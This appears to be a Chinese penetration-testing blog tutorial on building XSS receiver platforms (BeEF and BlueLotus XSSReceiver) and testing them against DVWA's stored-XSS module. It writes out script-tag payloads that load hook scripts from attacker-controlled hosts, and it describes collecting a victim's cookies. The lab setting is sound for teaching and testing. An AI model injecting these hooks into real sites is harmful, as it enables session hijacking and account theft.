欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

搭建XSS平台——XSS工具的利用

程序员文章站 2022-05-26 07:52:01
...

实验一:XSS攻击框架beef

实验环境:kali、DVWA

实验步骤:

1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef)

搭建XSS平台——XSS工具的利用搭建XSS平台——XSS工具的利用

2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下:

<script src="http://192.168.1.106:3000/hook.js"></script>

搭建XSS平台——XSS工具的利用

3.在低级DVWA中的储存式XSS模块中输入以下内容,可看到kali上面有了变化

搭建XSS平台——XSS工具的利用搭建XSS平台——XSS工具的利用

4.此时,便可进行攻击,举例说明:

依次点击下边序号所指的部分,即可获得其cookie值

搭建XSS平台——XSS工具的利用

实验二:Bluelotus_XSSReceiver搭建的XSS平台

实验环境:Bluelotus_XSSReceiver、DVWA

实验步骤:

1.在Github网站上下载Bluelotus_XSSReceiver环境安装包,并将其放在www目录下,访问该安装包的路径,然后登陆(密码为:blueloyus),进入以下页面

搭建XSS平台——XSS工具的利用

2.选择一个js脚本,复制其地址,并将ip改为自己的ip,代码如下:

<script src="http://192.168.1.101:81/BlueLotus/myjs/copyright.js"></script>

搭建XSS平台——XSS工具的利用

3.在低级别DVWA中的储存型XSS模块,输入js脚本,上传留言,显示下面内容:

搭建XSS平台——XSS工具的利用

4.同样也可选择其他js脚本,如下图(这里需要将路径修改为攻击者Bluelotus_XSSReceiver的路径):

脚本如下:

<script src="http://192.168.1.101:81/BlueLotus/myjs/my.js"></script>

搭建XSS平台——XSS工具的利用

 

5.在低级别DVWA中的储存型XSS模块,输入js脚本,上传留言,在Bluelotus_XSSReceiver显示下面内容,证明成功:

搭建XSS平台——XSS工具的利用

相关标签: web渗透